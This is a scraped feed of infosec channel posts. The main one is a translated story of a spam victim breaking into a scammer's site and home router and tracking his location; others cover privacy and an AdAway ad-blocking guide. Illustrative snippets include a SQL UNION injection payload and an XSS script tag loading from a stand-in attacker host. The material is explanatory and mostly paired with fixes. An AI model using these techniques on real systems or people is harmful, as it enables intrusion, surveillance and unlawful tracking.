A spam victim hacks back.
"I give you the choice to inherit me. You' re getting $10 million." Who is behind this kind of spam? A hacker went on a search and found what he was looking for.
It all started with an email that promised to make me rich - again. Someone is seriously ill, has stashed ten million US dollars abroad and wants me to have a share - lucky me. This is of course complete nonsense, one of the millions of spam mails that probably everyone has received at some point. Automatically I move the mouse pointer over the delete button - and pause. I've had enough, I'm fed up! This time I would get to the bottom of it. I wanted to know how the scammer operates - and maybe even get him caught.
Careless impostor
After some back and forth by mail, the scammer lured me to a fake online-banking site from which I was supposed to transfer the fortune to my account. That failed, of course, and the fraudster claimed I could only get a valid TAN by paying 2,500 US dollars. Of course, I thought, and took a closer look at the website. I came across a SQL injection vulnerability. With a few targeted SQL commands I was able to dump a database containing details of the admin page of a large-scale spam campaign. Conveniently, the login credentials for that page were in there as well - facepalm.
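The article doesn't show the actual queries; as a rough illustration of how string-concatenated SQL lets an attacker read a completely different table, here is a minimal sketch using an in-memory SQLite database (all table, column and credential names are invented):

```python
import sqlite3

# Toy database: a public table the page queries, plus a "hidden"
# admin table the attacker is not supposed to reach.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE accounts (name TEXT, balance INTEGER)")
db.execute("INSERT INTO accounts VALUES ('alice', 100)")
db.execute("CREATE TABLE admins (user TEXT, password TEXT)")
db.execute("INSERT INTO admins VALUES ('admin', 'hunter2')")

def lookup(name: str):
    # Vulnerable: user input is concatenated straight into the SQL string.
    sql = f"SELECT name, balance FROM accounts WHERE name = '{name}'"
    return db.execute(sql).fetchall()

# A classic UNION-based payload pulls rows from another table;
# the trailing "--" comments out the query's closing quote.
payload = "x' UNION SELECT user, password FROM admins --"
print(lookup(payload))  # leaks the admin credentials
```

Using a parameterized query (`db.execute("... WHERE name = ?", (name,))`) instead of string formatting closes the hole.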
But it gets even better: the campaign website had a security problem of its own. By means of a stored cross-site scripting (XSS) attack, I was able to plant in the first-name database field an instruction that loads a JavaScript file hosted on a server under my control into the administration page. I then changed the login credentials and laid out a bait: I informed the fraudster that I had taken control of the site and that the new login data was available only for money. He took the bait, opened the administration panel and reset the data. In doing so he loaded the script from my server, and I was able to record his IP address.
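The attack relies on the admin page rendering the stored first-name field without HTML-escaping it. A minimal sketch of that failure mode (the payload URL and markup are invented examples):

```python
import html

# What the attacker stores in the "first name" field: a script tag
# pointing at a server they control (placeholder URL).
first_name = '<script src="https://attacker.example/log.js"></script>'

def render_unsafe(name: str) -> str:
    # Vulnerable: the stored value is interpolated into the page as-is,
    # so the admin's browser fetches and runs the attacker's script.
    return f"<td>{name}</td>"

def render_safe(name: str) -> str:
    # Escaping the value on output turns the payload into inert text.
    return f"<td>{html.escape(name)}</td>"

assert "<script" in render_unsafe(first_name)
assert "<script" not in render_safe(first_name)
```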
From the provider to the router
A whois query for the recorded IP address revealed that it belongs to the South African provider Hitec Sure. A subsequent port scan turned up the web interface of a TP-Link router on port 666. At this point another facepalm was due: the fraudster had not changed the router's default credentials, and I could log in with the username "admin" and the password "admin".
By adjusting the DNS server configuration in the router, I redirected requests and recorded data: from then on I could watch all of the fraudster's internet activity in real time. It turned out that he was constantly scanning for poorly secured mail servers. Within ten days, about 750 MB of data accumulated. From the router's web interface I could also read out the PPPoE credentials. Who would have thought it: the same credentials also worked in the provider's customer portal. After registering there, I could see the full name of the connection's owner. Since the provider portal does not reveal any address data, the swindler's exact place of residence was still unknown at this point.
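Once a router hands its clients an attacker-controlled DNS server, every hostname the victim resolves passes through it. A stripped-down sketch of the core step of such a logging resolver - extracting the queried name from a raw DNS packet (the UDP relay loop is omitted; the packet below is hand-built per the DNS wire format):

```python
def parse_qname(packet: bytes) -> str:
    """Extract the first queried hostname from a raw DNS query packet.

    A DNS query starts with a 12-byte header, followed by the name
    encoded as length-prefixed labels terminated by a zero byte.
    """
    labels = []
    i = 12  # skip the fixed-size header
    while packet[i] != 0:
        length = packet[i]
        labels.append(packet[i + 1:i + 1 + length].decode("ascii"))
        i += 1 + length
    return ".".join(labels)

# A hand-built standard query for "example.com":
query = (
    b"\x12\x34"          # transaction ID
    b"\x01\x00"          # flags: standard query, recursion desired
    b"\x00\x01\x00\x00\x00\x00\x00\x00"  # 1 question, no other records
    b"\x07example\x03com\x00"            # QNAME as length-prefixed labels
    b"\x00\x01\x00\x01"  # QTYPE A, QCLASS IN
)
print(parse_qname(query))  # example.com
```

A real logging resolver would bind UDP port 53, call `parse_qname` on each incoming packet, log the name with a timestamp, and relay the packet unchanged to an upstream resolver so the victim notices nothing.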
Address search
I happen to own the same TP-Link model as the spammer, so I was able to build and successfully test a suitable alternative firmware in the form of an OpenWrt image. I preconfigured it with the provider and Wi-Fi credentials I had read out and flashed it via the web interface of the fraudster's router. By default the device refuses firmware updates over remote maintenance, but I could work around that with comparatively little effort: in the relevant input fields, only an HTML `disabled` attribute blocked the process. I removed the attribute without any trouble and performed the update remotely.
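The `disabled` attribute is enforced only by the browser; the server never sees it. Whether you strip it in the browser's developer tools, as described above, or craft the request yourself, the effect is the same. A small sketch of both ideas (the form markup and field names are invented):

```python
import re
from urllib.parse import urlencode

form_html = '<input name="firmware" type="file" disabled>'

def strip_disabled(markup: str) -> str:
    # What editing the page in the dev tools amounts to: removing the
    # attribute re-enables the input purely client-side.
    return re.sub(r"\sdisabled\b", "", markup)

print(strip_disabled(form_html))  # <input name="firmware" type="file">

# Equivalently, skip the page entirely and build the POST body yourself;
# a client-side-only restriction cannot stop a hand-crafted request.
body = urlencode({"action": "upgrade", "firmware": "openwrt.bin"})
print(body)  # action=upgrade&firmware=openwrt.bin
```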
"I give you the choice to inherit me. You' re getting $10 million." Who is behind this kind of spam? A hacker went on a search and found what he was looking for.
Everything started with a mail that promised to make me rich - again. Someone is seriously ill, has stashed 10 million US dollars abroad and wants me to participate - I'm lucky. This is of course total nonsense and one of millions of spam mails that probably everyone has ever received. Automatically I move the mouse pointer over the delete button - and pause. I've had enough, I'm fed up! This time I get on the number. I wanted to know how the cheater proceeds - and maybe even arrest him.
Careless impostor
After some mail conversation, the scammer lured me to a fake online banking site. From there I was supposed to transfer the assets to my account. That failed of course and the fraudster claimed to get a valid TAN only against the payment of 2500 US dollars. Of course, I thought and took a closer look at the website. I came across a SQL injection gap. With a few targeted SQL commands I was able to read out a database with details of an admin page for a large-scale spam campaign. Practically there was also the access data for the page - Facepalm.
But it gets even better: The campaign website also had a security problem. By means of a cross-site noscripting attack (stored XSS), I was able to infiltrate the first name database field with the instruction to call a Java noscript stored on a server controlled by me into the administration page. Consequently, I changed the access data and laid out a bait: I informed the fraudster that I had control over the site and that the new login data was only available for money. He bit, called the administration panel and reset the data. He loaded the noscript from my server and I could save his IP address.
From the provider to the router
A Whois query for the recorded IP address revealed that it belongs to the South African provider Hitec Sure. A subsequent scan revealed port 666 of the web interface of a TP Link Router. At this point another facepalm was due: The fraudster did not change the router's default access data and I could log in with the username "admin" and the password "admin".
By adjusting the DNS server configuration in the router, I redirected requests and recorded data: From now on I could watch all internet activities of the fraudster in real time. It turned out that the fraudster was constantly scanning for badly secured mail servers. Within ten days, about 750 MBytes of data were collected. I could read the PPPoE access data from the web interface of the router. Who would have thought that: Practically these data worked also in the customer portal of the provider. After I had registered there, I could see the complete name of the connection owner. Since the provider portal does not reveal any address data, the exact place of residence of the swindler was still unclear at this time.
Address search
I happen to have the same TP-Link model as the spammer. As a result, I was able to create and successfully test a suitable alternative firmware in the form of an OpenWRT image. I then pre-configured this with the provider and WLAN access data I had read out and flashed it via the web interface of the fraud router. By default, however, the device refuses to update the firmware via remote maintenance. However, I could handle this with comparatively little effort: In the corresponding input fields, only an HTML attribute set to Disabled prohibited this process. I was able to remove the attribute without any problems and update it remotely.
In addition to the provider data and the Wi-Fi configuration, I also added a DynDNS client and a firewall rule for an SSH server to the image, giving me remote access to the device. Afterwards I could read out the router's MAC address as well as three SSIDs of surrounding networks. With a free trial account at the geolocation service provider Combain I obtained the approximate coordinates of these networks. With this information I could finally narrow the fraudster's location down to a particular street in Johannesburg, South Africa. I left it at that for the time being and stopped contacting the spammer.
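Wi-Fi geolocation services generally accept a list of observed access points (BSSIDs and signal strengths) and return coordinates with an accuracy radius. I don't know Combain's exact API, so the request shape below is a generic, hypothetical one (the MAC addresses are made up); only the idea matters - a handful of nearby networks is enough to pin a location down to a street:

```python
import json

# Hypothetical scan results - MAC addresses are examples only.
observed_aps = [
    {"bssid": "00:11:22:33:44:55", "signal_dbm": -48},
    {"bssid": "66:77:88:99:aa:bb", "signal_dbm": -61},
    {"bssid": "cc:dd:ee:ff:00:11", "signal_dbm": -70},
]

def build_geolocation_request(aps):
    # Package the scan results the way typical geolocation APIs
    # (Combain, Mozilla Location Service, Google, ...) expect them.
    return json.dumps({"wifiAccessPoints": aps})

payload = build_geolocation_request(observed_aps)
# This payload would then be POSTed to the provider's endpoint with an
# API key; the response typically contains lat/lon plus an accuracy radius.
```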
Now I was sitting on a gigantic heap of data and didn't quite know what to do with this rather explosive information. Go to the police? Difficult. Through my actions I had almost certainly made myself criminally liable. In the end I decided to send the data via the anonymous mailbox of the ....... editorial office. In consultation with the editors, we then decided to publish the story anonymously.
https://www.heise.de/ct/artikel/Ein-Spam-Opfer-hackt-zurueck-4416729.html
#spam #mail #victim #hacking
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📺 ZombieLoad: Cross Privilege-Boundary Data Leakage
In this scenario, we constantly sample data using ZombieLoad and match leaked values against a list of predefined keywords.
The adversary application prints keywords whenever the victim browser process handles data that matches the list of adversary keywords.
Note that the video shows a browser that runs inside a VM:
ZombieLoad leaks across sibling Hyperthreads regardless of virtual machine boundaries.
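The leak itself requires the actual ZombieLoad proof-of-concept; the keyword-matching step described above, however, is ordinary stream filtering. A hedged sketch of that post-processing (the sampled byte window below is a made-up stand-in for what the real PoC sampler would return):

```python
# Keywords the adversary is watching for in the leaked byte stream.
KEYWORDS = [b"password", b"secret", b"token"]

def match_keywords(samples: bytes):
    # Leaked bytes arrive noisy and without context; the adversary
    # simply scans each sampled window for any predefined keyword.
    return [kw for kw in KEYWORDS if kw in samples]

# Stand-in for a window of bytes recovered by the actual PoC sampler.
leaked_window = b"\x00\x13user=alice&password=hunter2\x7f"
print(match_keywords(leaked_window))  # [b'password']
```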
📺 https://www.cyberus-technology.de/posts/2019-05-14-zombieload.html
#ZombieLoad #video #podcast #poc
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
📺 San Francisco leaders ban facial recognition tech
San Francisco supervisors today approved a ban on police using facial recognition technology, making it the first city in the U.S. with such a restriction.
📺 https://www.youtube.com/watch?v=2OCR4By38vc
#USA #SanFrancisco #ban #police #facialrecon
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
🎧 Elfin APT group targets Middle East energy sector.
Researchers at Symantec have been tracking an espionage group known as Elfin (aka APT33) that has targeted dozens of organizations over the past three years, focusing primarily on Saudi Arabia and the United States.
📻 #ResearchSaturday #CyberWire #podcast
https://www.thecyberwire.com/podcasts/cw-podcasts-rs-2019-05-18.html
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
Data Security - What Google, Facebook and Microsoft really know about you
Quickly google something, drop a like here and there, then order something online via Cortana: everyday life for many people - but with every action we willingly hand over our data. How much the internet knows about each of us is frightening.
Google knows everything?
Yes, and much more! Sometimes Google even knows things we don't know ourselves - the best example being what Google actually knows about us. Dieter Bohn, editor-in-chief of "The Verge", put it very elegantly: https://twitter.com/backlon/status/1126662189127950336
"Google: our advanced AI algorithms can predict what car you want to rent and then fill out the web form for you. It knows what you want and just does it."
Mark Vang of the World Community Computing Grid, an IBM project where people make their PCs and computing power available to research, added: https://twitter.com/chmod777Mark/status/1127191469880684544
"...also, all that data we have collected and continue to collect will stay right on our servers where we can sell it to anyone... but feel free to "delete" your account at any time..."
If you use a free service, you are the product
But Google is not the only internet giant after our data. Microsoft and Facebook, autonomous vehicles and smart homes also collect plenty of it. Why? Because - at least in Facebook's case - we willingly tell them everything they want to know, and because it makes money.
Do you also want to know what the internet knows about you? The answer is frightening.
Dylan Curran, privacy advisor for Presearch.org and former advisor to the American Civil Liberties Union (ACLU), has examined the data the big companies have collected about him. These are his findings: https://twitter.com/iamdylancurran/status/977559925680467968
❗️Movement profile
Google keeps track of where you've been in recent weeks, months, and years, when you've been there, and how much time it took you to get from one place to another.
Even if you've disabled location tracking, Google stores location data from other sources - for instance which Wi-Fi network you use and your search queries on Google Maps.
At https://www.google.com/maps/timeline?pb you can retrieve your own motion profile.
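The same movement profile can also be exported via Google Takeout as JSON. A small sketch of reading such an export - the field names (`locations`, `timestampMs`, `latitudeE7`) follow the location-history format Takeout used at the time, where coordinates are stored as integers scaled by 10^7:

```python
import json

def parse_location_history(raw: str):
    """Yield (timestamp_ms, lat, lon) tuples from a Takeout export."""
    data = json.loads(raw)
    for loc in data.get("locations", []):
        yield (
            int(loc["timestampMs"]),
            loc["latitudeE7"] / 1e7,   # undo the 1e7 fixed-point scaling
            loc["longitudeE7"] / 1e7,
        )

# A minimal example record in the export's shape (coordinates invented):
sample = ('{"locations": [{"timestampMs": "1558000000000",'
          ' "latitudeE7": 520520000, "longitudeE7": 43770000}]}')
for ts, lat, lon in parse_location_history(sample):
    print(ts, lat, lon)  # 1558000000000 52.052 4.377
```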
❗️Google knows everything you have ever searched for - and deleted
In addition to your motion profile, Google creates a cross-device personal search profile from all your search queries. This means that even if you delete your search history on a device, the data is still there.
At https://myactivity.google.com/myactivity you can check your activity log and change your activity settings.
❗️Advertisement
Google not only stores data, it also combines them in various ways. You never searched for "How do I lose 10 kg in 2 weeks"? You don't need to: Google can already tell that you are a woman in her early thirties who has been looking for organic shops in her area.
The combination of location data, gender, age, hobbies (search queries), career, interests, relationship status and approximate weight as well as income leads to a unique marketing profile on the basis of which you receive advertising.
At https://www.google.com/settings/ads/ you can view your advertising profile.
❗️App usage
You use an ad blocker? Google knows. You often translate texts? Google knows. You use a Doodle poll to plan an international business meeting? Google knows, because it stores all the data about the apps and extensions you use.
That includes which apps you use, when and where you use them, how often and for how long, and whom you communicate with - including whom you chat with on Facebook, where that person lives, and when you go to sleep.
At https://myaccount.google.com/permissions you can access the apps with access to your account.
❗️Google knows all the YouTube videos you've ever watched
Google stores every video you've ever searched for and watched on YouTube - even the ones you closed after a few seconds.
Accordingly, Google knows whether you're about to become a parent, what your political views are, what your religion is, whether you're depressed or even suicidal.
More: https://www.youtube.com/feed/history/search_history
❗️ Three million pages' worth of data
The good thing about Google is that you can request and view all this data. Dylan Curran did just that and received an archive file of 5.5 GB. That's about three million pages of continuous text.
If you are curious: Under the motto "Your account, your data", at https://takeout.google.com/settings/takeout you can "export a copy of the content from your Google Account if you want to back it up or use it with a service from another provider," says Google.
This data includes all the above information, plus bookmarks, email, contacts, Google Drive files, photos taken with your phone, stores where you bought something, and products you bought on Google.
Plus your calendar, Hangouts conversations, music, books, groups, websites you created, phones you owned, pages you shared, how many steps you took per day - a nearly endless list.
❗️How Google gets your data
Even though you probably don't like that answer: You give your data voluntarily. The Google archive of collected data will show you how.
👉🏼 1. Search history
Dylan Curran's search history comprised more than 90,000 entries, including images he had downloaded and websites he had visited. Naturally, the history also contains any searches for sites offering illegal downloads of programs, movies and music - data that could be used against you in court and cause serious damage.
👉🏼 2. Calendar
Your calendar reveals more about you than you might want to admit: it shows every appointment you've ever added, whether you ultimately kept it or not.
Combined with your location data, Google knows whether you were there, when you arrived - and, in the case of a job interview, how the appointment went. If you were on your way back very quickly, you probably didn't get the dream job.
👉🏼 3. Google Drive
The Google archive also includes your entire Google Drive, including files you deleted long ago. Among other things, Dylan found his resume, monthly financial overviews, website source code, and a "permanently deleted" PGP key he had used to encrypt his emails.
👉🏼 4. Google Fit
Even small wearables like smartwatches and fitness trackers contribute to the big corporations' data-collection frenzy. Although Dylan Curran had deleted this data months earlier and revoked all the apps' permissions, he found - quite literally - a record of his every step.
Google Fit had diligently counted every step he ever took, along with when and where he went - including, of course, every session of relaxation, yoga or fitness exercise.
👉🏼 5. Photos
If you accidentally deleted all your photos, don't worry, Google still has them all - including metadata about when, where, and with what device you took them. Well sorted by year and date, of course.
👉🏼 6. Emails
If you use Google Mail or Gmail, Google also has all the emails you've ever sent or received. The same applies to all emails you have deleted and those you have never received (because they have been categorized as spam).
👉🏼 7. Activity log
The activity log, in turn, contains thousands of files and could probably reconstruct, down to the day and second, how you were feeling. Given the sheer volume of this data, Dylan Curran could present only a brief selection:
Google stores all the ads you've ever seen or clicked on, every app you've opened, installed or searched for, and every webpage you've ever visited.
Every image you searched or saved, every place you searched or clicked, every news item and newspaper article, every video you clicked on, and every search query you've made since your first Google search - whether you have a Google Account or not!
❗️ Data security on Facebook
Facebook also offers the option to download your private data. For Dylan Curran, this file was "only" 600 MB, or about 400,000 pages of text.
It contained all the messages he had ever sent or received, all his phone contacts, and all his voice messages.
In addition, Facebook stores all your (possible) interests based on the posts you have clicked on or hidden and - rather trivial from a privacy standpoint - every sticker you have ever sent or received.
👉🏼 Log
In addition, Facebook - much like Google - stores activity data every time you log in: where you logged in from and which device you were using at the time.
The company also stores data from all apps ever connected to Facebook, so Facebook knows your political views and interests. Facebook may also know that you were single (because you installed/uninstalled Tinder) and had a new smartphone in November.
❗️ Data security is a top priority for Windows 😉
In principle, yes: anyone using Windows 10 has countless options for "protecting" their privacy. In fact there are so many that it becomes confusing. Very few people actually take the time to read through all 16 (!) menu items with their respective options and sub-settings and decide on each one individually. And categorically switching everything off provides neither optimal protection nor an optimal user experience.
Google's new security concept works in a very similar way under the motto: "You have the choice" - except that nobody explains to you what you can actually choose there.
👉🏼 External control of webcam and microphone
The data Windows stores by default again includes location data, which programs you have installed, when you installed them and how you use them - plus contacts, email, calendar, call history, text messages, favorite recipes, games, downloads, photos, videos, music, your online and offline search history, and even which radio station you listen to. On top of that, Windows has constant access to your cameras and microphones.
It is also one of the great paradoxes of modern society: we would never allow the government to put cameras or microphones in our homes or movement trackers in our clothes - yet we do it voluntarily because, let's face it, we really want to see that cute cat video.
Source (german) and more info:
https://www.epochtimes.de/genial/tech/datensicherheit-das-wissen-google-facebook-und-microsoft-wirklich-ueber-sie-a2885439.html
#google #facebook #microsoft #data #privacy #why
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
In addition, Facebook stores all your (possible) interests based on the posts you have clicked or hidden and - rather pointless to the privacy officer - all the stickers you have ever sent or received.
👉🏼 log
In addition, Facebook - similar to Google - stores all your activity data when you log in. This includes the from where and which device was currently used.
The company also stores data from all apps ever connected to Facebook, so Facebook knows your political views and interests. Facebook may also know that you were single (because you installed/uninstalled Tinder) and had a new smartphone in November.
❗️ Data security is a top priority for Windows 😉
In principle yes, because those who use Windows 10 have countless possibilities to "protect" their privacy. In fact, there are so many that it becomes confusing. Very few people actually take the time to read through all 16 (!) menu items and their respective options and further settings and decide individually. Categorically deactivating all switches neither provides the optimal protection nor the optimal user experience.
Google's new security concept works in a very similar way under the motto: "You have the choice" - except that nobody explains to you what you can actually choose there.
👉🏼 External control of webcam and microphone
The data that Windows stores by default again includes location data, what programs you have installed, when you installed them, and how you use them. In addition: Contacts, email, calendar, call history, text messages, favorite recipes, games, downloads, photos, videos, music, on and offline search history, and even what radio station you're listening to. Plus, Windows has constant access to your cameras and microphones.
But it is also one of the biggest paradoxes of modern society: we would never allow the government to place cameras or microphones in our homes or movement trackers in our clothes, yet we do it voluntarily, because - let's face it - we really want to see that sweet cat video.
Source (german) and more info:
https://www.epochtimes.de/genial/tech/datensicherheit-das-wissen-google-facebook-und-microsoft-wirklich-ueber-sie-a2885439.html
#google #facebook #microsoft #data #privacy #why
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
CMOinfographic.pdf
25.8 MB
A Look Back At 25 Years Of Digital Advertising
Advertising has always found a way to adapt to the medium. But the introduction of the “World Wide Web” in 1991 truly changed everything—providing advertisers with an unprecedented opportunity to flex their creative chops. Within a few years, new and entirely different types of ads began to, quite literally, pop up.
PDF:
https://www.cmo.com/content/dam/CMO_Other/articles/CMOinfographic.pdf
Article:
https://www.cmo.com/features/articles/2019/3/19/25-years-of-digital.html#gs.cig5lu
German:
https://news.1rj.ru/str/cRyPtHoN_INFOSEC_DE/3032
#advertising #ads #history #pdf
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
Audio
🎧 The CyberWire Daily Podcast - May 20, 2019
Huawei is on the US Entity List, and US exporters have been quick to notice and cut the Shenzhen company off.
Security concerns are now expected to shift to the undersea cable market.
Hacktivism seems to have gone into eclipse.
The EU enacts a sanctions regime to deter election hacking.
Facebook shutters inauthentic accounts targeting African politics.
Salesforce is restoring service after an unhappy upgrade.
OGuser forum hacked. And don’t worry about a hacker draft.
Jonathan Katz from UMD on encryption for better security at border crossings.
Tamika Smith reports on the Baltimore City government ransomware situation.
📻 The #CyberWire Daily #podcast
https://www.thecyberwire.com/podcasts/cw-podcasts-daily-2019-05-20.html
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
AdAway: Advertising and tracking blocker - Take back control! (Part 6)
1. Data collection frenzy
In the last part of the article series I introduced you to the F-Droid Store, where you can get free and open-source apps that don't track you or display advertisements. A general recommendation of the article series "Take back control!" is therefore:
💡Get apps only from the F-Droid Store.
However, this advice cannot always be put into practice 1:1. Many users still depend on apps from the Play Store or cannot find a viable alternative in the F-Droid Store. Unfortunately, apps from the Google Play Store are not exactly known for data minimization - rather the opposite. Most of them contain third-party software components that display advertisements to the user or track their activity every step of the way. As a normal user, however, you have no insight into an app and cannot "see" from the outside whether it poses a risk to security and privacy.
Since the apps from the Play Store are often accompanied by a "loss of control", I will introduce you to the AdAway app from the F-Droid Store in this article. With this app, the loss of control can be minimized by putting a stop to the delivery of (harmful) advertising and the outflow of personal data to dubious third-party providers.
2. AdAway
AdAway is an open source advertising and tracking blocker for Android, which was originally developed by Dominik Schürmann - currently AdAway is developed by Bruce Bujon. Based on filter lists, connections to advertising and tracking networks are redirected to the local device IP address. This redirection prevents the reloading of advertisements or the transmission of (sensitive) data to third parties.
By the way, AdAway cannot be found in the Play Store because Google no longer allows ad blockers - they simply violate Google's business model. Or to put it another way: Google will not tolerate an app that effectively protects your privacy and security by preventing the reloading of (harmful) advertisements and the outflow of personal data.
💡There are several advantages to using AdAway:
Reduction in data consumption:
Opening, maintaining and closing (app) connections to servers on the Internet inevitably means that data is sent and received. While this is unlikely to be a problem in your home Wi-Fi thanks to a flat rate, mobile data use often presents a different picture. AdAway blocks the reloading of advertisements, tracking code and other resources. This saves valuable bandwidth, and your mobile data plan is not unnecessarily burdened.
Faster device:
The display of advertisements, the execution of reloaded tracking code and basically every (unnecessary) connection setup costs CPU power. If AdAway blocks these resources from being reloaded, not only will your battery last longer, but your device will also respond faster to your input.
Protection of privacy:
A major disadvantage of the predominantly proprietary apps located in the Google Play Store is the lack of transparency of data processing associated with their proprietary nature. Because with these proprietary apps we don't know and often can't check what they actually do (without our knowledge). However, if AdAway is able to block the majority of (app) connections to trackers and advertising networks, this can have a positive impact on our privacy.
AdAway not only blocks advertisements and trackers in your browser, but also in all apps you have installed on your device.
2.1 Concept | Technical background
Using the example of in-app advertising, I would like to briefly explain how AdAway works technically. Suppose an app developer has integrated an advertising module into his app. Each time the app starts, or while it is running, the app or the integrated module contacts the address:
werbung.server1.de
However, this domain name must first be translated into an IP address so that the advertisement can then be loaded from there. This service is provided by the Domain Name System (DNS) - one of the most important services on the Internet, which converts domain names into IP addresses. Everyone knows the principle: you enter a URL (the domain name) in the browser, and a DNS server translates it into the corresponding IP address - names are simply easier to remember than IP addresses. Your router usually uses your provider's DNS servers, or ones you have entered manually, which then translate the address "werbung.server1.de" into an IP address.

AdAway makes use of this DNS principle. In its memory, AdAway maintains a list of domain names that deliver advertisements, track users, or otherwise have a negative impact on security and privacy. Once you have installed AdAway, every DNS query is first compared with this internally stored list. If the address...
werbung.server1.de
...is on the list, the IP address is not resolved as usual; instead your device or app receives the answer "not reachable" - the translation into the correct IP address is suppressed by AdAway. The result: the advertisement cannot be loaded from its actual source. Instead of the advertisement, the user sees a placeholder or simply nothing. A simple principle that blocks the advertisement before it is even delivered - before the domain name is ever translated into an IP address.

2.2 Installation
The installation of AdAway is done conveniently via the F-Droid Store - where the app does not violate questionable business models, as is the case with Google. With a tap on Install the installation of AdAway is done within seconds.
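The blocking principle from section 2.1 can be sketched in a few lines. This is a simplified illustration, not AdAway's actual code; the domain names are the made-up examples from above.

```python
# Sketch of the hosts/DNS blocking principle described in section 2.1
# (illustrative only; domain names are made up).

HOSTS = {
    "werbung.server1.de": "0.0.0.0",   # ad server from the example -> blocked
    "tracker.example.net": "0.0.0.0",  # hypothetical tracking domain -> blocked
}

def resolve(domain):
    """Return the blocking address for listed domains; None means the query
    would fall through to a real DNS server and resolve normally."""
    return HOSTS.get(domain)

print(resolve("werbung.server1.de"))  # 0.0.0.0 -> the ad cannot be loaded
print(resolve("kuketz-blog.de"))      # None -> resolved normally via DNS
```

The real mechanism works the same way, only at the operating-system level: the hosts file is consulted before any DNS server is asked.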
2.3 Adjustment via Magisk
Due to the read-only system partition of the Aquaris X Pro, AdAway cannot simply modify the hosts file. This is necessary, however, so that all domains that should no longer be reachable can be stored there. Magisk offers a solution: open the Magisk Manager and go to its settings. There, tap once on Activate systemless hosts file.
3. Configuration
The configuration of AdAway is done within a few minutes. Many advertising and tracking domains are already blocked in the delivery state. By adding more filter lists we can improve the result even more.
3.1 Initial Start
Immediately after the first start, AdAway asks whether you want to send telemetry data (via Sentry) to the developer. This covers the following information:
Crash report and application failures,
Application usage.
Neither kind of report contains any personal data.
Then you can start AdAway directly with a tap on the activate button. AdAway then downloads the current (block) lists and updates the hosts file.
3.2 Settings
Via the menu item Settings you can configure various options of AdAway. Among other things, you can specify that the (block) lists should be updated daily. The download and installation can be done automatically in the background.
By default, AdAway redirects all blocked hostnames to the IP address 127.0.0.1. For speed reasons, you should change this, as redirecting to 127.0.0.1 (localhost) actually causes network traffic. Tap on the Redirection IP entry and configure the address there:
0.0.0.0
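With that setting, the resulting hosts entries would look roughly like this (the ad domain is the made-up example from section 2.1):

```
# default behaviour: blocked domains point to localhost,
# which still triggers a (local) connection attempt
127.0.0.1  werbung.server1.de

# after changing the redirection IP: 0.0.0.0 is unroutable,
# so the request fails immediately without any traffic
0.0.0.0    werbung.server1.de
```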
3.3 Blacklists | Add filter lists

Via the menu item Hosts sources you can add further filter lists. Three (block) lists are active in AdAway by default. You can use the plus sign to add additional lists that are not included in AdAway. My suggestion would be to add the following to the existing lists:
https://github.com/StevenBlack/hosts
💡Advice: In the AdAway wiki you will find further suggestions and filter lists.
https://github.com/AdAway/AdAway/wiki/HostsSources
Of course you can also activate other filter or (block) lists. Possible overlaps are removed automatically by AdAway - processing duplicate entries would be too inefficient. After adding the filter lists, AdAway first downloads them from their sources and merges them into one big list - so you will have to wait a moment.

Activating additional filter lists can lead to so-called "overblocking": domains that are necessary for the functionality of an app are filtered by mistake. You will then have to decide on a case-by-case basis whether to release such a domain in AdAway, i.e. put it on the whitelist. Further information on this topic can be found in Section 4.2.
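The merging and deduplication step can be sketched as follows - a simplified illustration of the idea, not AdAway's actual implementation; list contents are made up:

```python
# Sketch: merge several hosts-format filter lists into one list
# with duplicate entries removed (simplified, illustrative).

def parse_hosts(text):
    """Extract blocked domains from hosts-file text, ignoring comments."""
    domains = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()  # strip comments and whitespace
        if not line:
            continue
        parts = line.split()
        if len(parts) >= 2 and parts[0] in ("0.0.0.0", "127.0.0.1"):
            domains.extend(parts[1:])
    return domains

def merge_lists(*sources):
    """Merge several lists; the set drops duplicate entries automatically."""
    merged = set()
    for text in sources:
        merged.update(parse_hosts(text))
    return sorted(merged)

list_a = "0.0.0.0 ads.example.com\n0.0.0.0 tracker.example.net"
list_b = "127.0.0.1 tracker.example.net  # duplicate entry\n0.0.0.0 stats.example.org"
print(merge_lists(list_a, list_b))
# ['ads.example.com', 'stats.example.org', 'tracker.example.net']
```

Note how the domain listed in both sources survives only once in the merged result.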
4. AdAway in action
The configuration of AdAway is now complete, although you can customize it further to your needs. Unfortunately, AdAway does not offer the possibility to display the number of blocked domains - it should be more than 100,000.
4.1 Blocked Domains
As already mentioned, the phenomenon of overblocking can occur, which can under certain circumstances lead to an app or certain function no longer functioning correctly. Personally, I have not been able to observe this so far - however, I am not the appropriate yardstick in this respect either, as I deliberately do without the services of Google, Facebook and Co.
If an app no longer works as usual, you should first activate DNS logging via the menu item Record DNS Requests and then open the misbehaving app. Afterwards, open Record DNS Requests again and tap the button DISPLAY RESULTS; all logged DNS queries are then listed. As an example, I allow the domain "media.kuketz.de" by tapping the tick in the middle. AdAway remembers this selection and puts the domain on the whitelist:
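The effect of this whitelisting can be sketched in a few lines - a simplified illustration, not AdAway's code; the second domain name is made up:

```python
# Sketch: a whitelisted domain stays reachable even if a filter list
# contains it (simplified, illustrative).

BLOCKLIST = {"media.kuketz.de", "ads.example.com"}
WHITELIST = {"media.kuketz.de"}   # released again after overblocking

def is_blocked(domain):
    if domain in WHITELIST:       # the positive list always wins
        return False
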